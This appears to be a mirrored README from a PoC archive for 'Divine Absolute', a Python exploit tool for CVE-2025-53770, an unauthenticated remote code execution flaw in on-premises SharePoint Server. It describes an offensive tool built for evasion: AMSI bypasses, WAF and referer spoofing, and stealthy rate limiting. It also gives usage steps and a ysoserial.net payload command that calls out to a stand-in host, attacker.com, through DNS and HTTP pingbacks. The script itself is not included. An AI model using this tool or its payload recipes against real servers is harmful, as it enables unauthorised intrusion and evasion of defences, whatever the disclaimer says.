关联漏洞
描述
A sophisticated, wizard-driven Python exploit tool targeting CVE-2025-53770, a critical (CVSS 9.8) unauthenticated remote code execution (RCE) vulnerability in on-premises Microsoft SharePoint Server (2016, 2019, Subscription Edition)
介绍
# Divine Absolute - CVE-2025-53770 Exploit Tool
## Overview
**Divine Absolute** is a sophisticated, wizard-driven Python exploit tool targeting **CVE-2025-53770**, a critical (CVSS 9.8) unauthenticated remote code execution (RCE) vulnerability in on-premises Microsoft SharePoint Server (2016, 2019, Subscription Edition). This vulnerability, disclosed as a zero-day on July 19, 2025, stems from deserialization of untrusted data in `/_layouts/15/ToolPane.aspx`. The tool is designed for **ethical penetration testing and authorized security research only**, offering unparalleled precision, stealth, and adaptability for reconnaissance, exploitation, and verification.
**Repository**: [https://github.com/exfil0/CVE-2025-53770](https://github.com/exfil0/CVE-2025-53770)
> **⚠️ Legal Warning**: This tool is for lawful, authorized use only in controlled environments with explicit permission. Unauthorized use against systems you do not own or have permission to test is illegal and may result in severe legal consequences. The author assumes no liability for misuse.
## Features
- **Modes**:
- **Recon**: Detects SharePoint presence, version, and `ToolPane.aspx` accessibility with advanced scoring and regex (e.g., `16.0.0.\d+-\w+?`).
- **Exploit**: Delivers payloads via `ToolPane.aspx` with robust bypasses.
- **Full**: Combines recon and exploitation, with optional aggressive exploitation.
- **Payload Generation**:
- Integrates **ysoserial.net** for .NET deserialization payloads (e.g., ObjectDataProvider, LosFormatter).
- Optional **pythonnet** for fallback HTTP/DNS pingback payloads (e.g., `WebRequest.Create`, `Dns.GetHostEntry`).
- Supports GZIP compression with explicit encoding/decoding and base64 validation.
- Injects AMSI bypasses (basic reflection, obfuscated, or custom snippets) into PowerShell commands, including base64-encoded (`-enc`) payloads.
- **Bypasses**:
- URI evasion: Random or fixed suffixes (e.g., `/xp.aspx`, UUID-based).
- Referer spoofing: None, external domains (e.g., `www.google.com`), custom URLs, or internal SharePoint paths (e.g., `/_layouts/15/sharepoint.aspx`).
- **Stealth**:
- Adaptive rate limiting with a minimum RPS floor (0.01) and burst control.
- Thread-safe concurrency with lock-protected pacing and jitter (0-0.1s).
- **Verification**:
- Robust RCE confirmation with compiled OR regexes, retries on `RequestException`, and customizable status codes/paths.
- **Reconnaissance**:
- Enhanced SharePoint detection via headers (e.g., `MicrosoftSharePointTeamServices`), paths (e.g., `/versions.aspx`), and regexes.
- **Output**:
- JSON results with forensic logging for analysis.
- **Usability**:
- Interactive wizard for easy configuration.
- Supports Mono/Wine for ysoserial.net on non-Windows systems.
- Proxy support (HTTP/SOCKS5) and customizable timeouts.
## CVE-2025-53770 Context
- **Vulnerability**: Unauthenticated RCE via deserialization in `/_layouts/15/ToolPane.aspx`.
- **Affected**: SharePoint Server 2016, 2019, Subscription Edition (EOL 2010/2013 also vulnerable).
- **Unaffected**: SharePoint Online (M365).
- **Exploited**: Since July 18, 2025, in campaigns like "ToolShell" by state-sponsored actors (e.g., Linen Typhoon).
- **Patches**: Microsoft patches (e.g., KB5002768, KB5002754) released July 19, 2025, mitigate fully. CISA KEV listing mandates federal patching by July 21, 2025.
- **Mitigations**: Patch, rotate keys post-patch, enable AMSI/Defender (Full Mode), monitor `/ToolPane.aspx` POSTs, use WAF rules (e.g., Cloudflare).
## Installation
### Prerequisites
- **Python 3.8+**
- **Dependencies**:
```bash
pip install requests termcolor
```
- **Optional (for .NET serialization fallback)**:
```bash
pip install pythonnet
```
- **ysoserial.net**:
- Download from [ysoserial.net releases](https://github.com/pwntester/ysoserial.net/releases).
- Place `ysoserial.exe` in a known path (e.g., `./ysoserial.exe`).
- **Mono/Wine** (non-Windows systems):
```bash
# Ubuntu/Debian
sudo apt-get install mono-complete
# macOS (via Homebrew)
brew install mono
```
- **Docker Lab** (recommended for testing):
```bash
docker pull mcr.microsoft.com/sharepoint/server:2019
```
### Setup
1. Clone the repository:
```bash
git clone https://github.com/exfil0/CVE-2025-53770.git
cd CVE-2025-53770
```
2. Install Python dependencies:
```bash
pip install -r requirements.txt
```
3. Ensure `ysoserial.exe` is accessible or provide its path during execution.
4. (Optional) Verify Mono/Wine for non-Windows systems.
## Usage
Run the interactive wizard:
```bash
python divine_absolute.py
```
### Workflow
1. **Mode Selection**:
- `Recon`: Scans for SharePoint presence and version.
- `Exploit`: Sends payload to `ToolPane.aspx`.
- `Full`: Recon + exploit (optional aggressive mode).
2. **Target Input**:
- Single URL (e.g., `https://sharepoint.example.com`).
- File with URLs (one per line).
3. **Payload Configuration**:
- **ysoserial.net**: Specify path, gadget (e.g., `ObjectDataProvider`), and command (e.g., `cmd /c whoami`).
- **File**: Load base64 GZIP payload from file.
- **String**: Input base64 GZIP payload directly.
- **Pingback**: Generate HTTP/DNS pingback (e.g., `http://attacker.com/callback` or `sub.attacker.com`).
- AMSI bypass: Choose `NONE`, `BASIC_REFLECTION`, `CONCAT_OBFUSCATED`, or custom snippet.
4. **Bypass Options**:
- URI: `NONE`, `FIXED` (e.g., `/xp.aspx`), `RANDOM` (UUID-based).
- Referer: `DEFAULT_SP`, `NO_REFERER`, `RANDOM_EXTERNAL`, `CUSTOM_URL`.
5. **Network Settings**:
- Proxy (e.g., `http://127.0.0.1:8080`).
- Threads, timeout, jitter, and rate limit (RPS).
6. **RCE Verification**:
- Specify path (e.g., `/sitepages/result.txt`), regexes (e.g., `Xanthorox.*`), status codes (e.g., `200,403`), attempts, delay, and timeout.
### Example Commands
- **Reconnaissance**:
```bash
python divine_absolute.py
# Select: Mode=Recon, Target=https://sharepoint.example.com
```
- **Exploit with ysoserial.net**:
```bash
python divine_absolute.py
# Select: Mode=Exploit, Target=https://sharepoint.example.com, Payload=YSOSERIAL,
# ysoserial.exe path=./ysoserial.exe, Gadget=ObjectDataProvider,
# Command="cmd /c echo %COMPUTERNAME% > C:\Temp\out.txt"
```
- **Full Mode with Verification**:
```bash
python divine_absolute.py
# Select: Mode=Full, Target=target_list.txt, Payload=FILE, Payload File=payload.b64,
# Verify Path=/sitepages/out.txt, Regexes="COMPUTERNAME", Status Codes=200
```
- **DNS Pingback**:
```bash
python divine_absolute.py
# Select: Mode=Exploit, Payload=PINGBACK, Pingback URL=sub.attacker.com
```
### Output
Results are saved in `xanthorox_results.json` with fields:
- `target`: URL tested.
- `sharepoint_detected`: Boolean.
- `toolpane_accessible`: Boolean.
- `exploited`: Boolean (payload sent).
- `verified_rce`: Boolean/None (RCE confirmed).
- `error`: Any errors encountered.
Example:
```json
[
{
"target": "https://sharepoint.example.com",
"sharepoint_detected": true,
"toolpane_accessible": true,
"exploited": true,
"verified_rce": true,
"error": null
}
]
```
## Improvements Addressed
This version fixes:
- **Adaptive Rate Limiting**: Ignores non-retry errors (e.g., 404) for success/error counts; enforces a minimum RPS floor (0.01).
- **AMSI Injection**: Decodes and injects bypasses into base64-encoded PowerShell (`-enc`) commands; supports non-PowerShell (e.g., `cmd.exe`) with warnings.
- **Pingback Fallback**: Uses `pythonnet` for reliable DNS pingback with `Dns.GetHostEntry` (experimental, requires gadget for full effect).
## Testing Recommendations
- **Lab Setup**: Use a SharePoint Server 2019 Docker container (unpatched) for safe testing.
- **WAF Testing**: Validate bypasses against Cloudflare or similar WAFs with adaptive RPS.
- **Payload Testing**: Generate payloads with `ysoserial.exe -f LosFormatter -g ObjectDataProvider -c "cmd /c nslookup sub.attacker.com" -o base64` and verify DNS logs.
## Known Limitations
- **Pingback Reliability**: `Dns.GetHostEntry` in `pythonnet` may not trigger without a specific gadget chain.
- **Complex Commands**: Non-standard PowerShell commands may require manual AMSI bypass injection.
- **WAF Detection**: Some WAFs may block payloads despite bypasses; test thoroughly.
## Contributing
Contributions are welcome! Please:
1. Fork the repository.
2. Create a feature branch (`git checkout -b feature/awesome-improvement`).
3. Commit changes (`git commit -m "Add awesome improvement"`).
4. Push to the branch (`git push origin feature/awesome-improvement`).
5. Open a pull request.
## License
This project is licensed under the MIT License. See [LICENSE](LICENSE) for details.
## Acknowledgments
- **xAI**: For inspiring cutting-edge security research.
- **ysoserial.net Team**: For the .NET deserialization payload generator.
- **Security Community**: For insights into CVE-2025-53770 exploitation and mitigations.
## Contact
- **Author**: @exfil0
- **Issues**: [GitHub Issues](https://github.com/exfil0/CVE-2025-53770/issues)
- **Telegram**: [https://t.me/GOTOCVE](https://t.me/GOTOCVE)
> **Note**: Always verify payloads and configurations in a controlled lab before use. Stay ethical, stay legal.
文件快照
[4.0K] /data/pocs/320a76d8b672ce3cfe587e5807f0fd0e45c4971e
├── [ 68K] divine_absolute.py
├── [9.2K] README.md
└── [ 51] requirements.txt
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。